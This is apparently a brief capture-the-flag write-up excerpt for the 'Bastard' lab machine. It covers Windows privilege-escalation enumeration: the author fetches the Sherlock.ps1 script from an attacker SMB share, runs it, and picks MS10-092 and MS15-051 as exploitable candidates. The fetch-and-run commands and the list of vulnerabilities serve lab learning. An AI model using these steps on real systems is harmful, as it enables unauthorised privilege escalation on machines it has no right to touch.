Bastard_Sherlock

Sherlock

---

ps c:\tmp> copy \\10.10.14.6\smb\Sherlock.ps1
ps c:\tmp> . .\Sherlock.ps1

Transfer the Sherlock.ps1 script

ps c:\tmp> Find-AllVulns
 
[...REDACTED...]
 
title      : User Mode to Ring (KiTrap0D)
msbulletin : MS10-015
cveid      : 2010-0232
link       : https://www.exploit-db.com/exploits/11199/
vulnstatus : Not supported on 64-bit systems
 
title      : Task Scheduler .XML
msbulletin : MS10-092
cveid      : 2010-3338, 2010-3888
link       : https://www.exploit-db.com/exploits/19930/
vulnstatus : Appears Vulnerable
 
title      : NTUserMessageCall Win32k Kernel Pool Overflow
msbulletin : MS13-053
cveid      : 2013-1300
link       : https://www.exploit-db.com/exploits/33213/
vulnstatus : Not supported on 64-bit systems
 
title      : TrackPopupMenuEx Win32k NULL Page
msbulletin : MS13-081
cveid      : 2013-3881
link       : https://www.exploit-db.com/exploits/31576/
vulnstatus : Not supported on 64-bit systems
 
title      : ClientCopyImage Win32k
msbulletin : MS15-051
cveid      : 2015-1701, 2015-2433
link       : https://www.exploit-db.com/exploits/37367/
vulnstatus : Appears Vulnerable
 
title      : 'mrxdav.sys' WebDAV
msbulletin : MS16-016
cveid      : 2016-0051
link       : https://www.exploit-db.com/exploits/40085/
vulnstatus : Not supported on 64-bit systems
 
[...REDACTED...]
 

Sherlock found a few vulnerabilities. Some of which are not supported by the architecture of the target system. so I would have to skip those

these are the sorted list:

• MS10-092 for CVE-2010-3338, CVE-2010-3888
• MS15-051 for CVE-2015-1701, CVE-2015-2433